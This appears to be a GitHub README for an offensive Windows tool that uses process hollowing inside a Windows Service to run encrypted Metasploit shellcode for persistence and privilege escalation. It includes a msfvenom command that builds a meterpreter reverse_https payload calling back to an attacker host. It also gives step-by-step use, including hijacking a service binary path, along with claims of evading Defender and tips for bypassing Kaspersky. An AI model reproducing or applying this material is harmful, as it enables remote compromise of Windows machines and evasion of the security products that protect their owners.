Skip to content

Latest commit

 

History

History
49 lines (36 loc) · 1.99 KB

README.md

File metadata and controls

49 lines (36 loc) · 1.99 KB

Logo

This program is a Windows Service that utilizes the 'process hollowing' technique to run shellcode. It requires the ROT-encrypted shellcode that the user will create using the HollowCrypt program. I created this because there were moments when I needed a custom and straightforward way to run Metasploit shellcode on a Windows Service for persistence/privilege escalation, and using common tools would trigger the AV over my binaries...

How to use it

First, we need to create our shellcode:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.147 LPORT=443 EXITFUNC=thread -f csharp

Then, edit the HollowCrypt source code , compile and execute:

HollowCrypt.exe

After that, replace the encrypted shellcode in the HollowSVC source code. Now compile the service in the arch of your target, setup your listener, hijack the binary/path in the target and run!

POC

Running service with path to HollowSVC executable:

legitsvc2

Meterpreter retrieved:

legitsvc3

Defender FUD, you will still need to implement OPSEC and be careful when launching meterpreter modules:

legitsvc4

And remember, there is always ways to improve this! (Use HTTPS cert with meterpreter, load STDAPI afterwards receiving the callback, meterpreter auto-migrate module, use dynamic shellcode encoding ,custom shellcode, etc)

Following those tips, you can bypass AVs like Kaspersky ;-)

photo_2023-07-20_22-35-40.jpg

photo_2023-07-20_22-36-35.jpg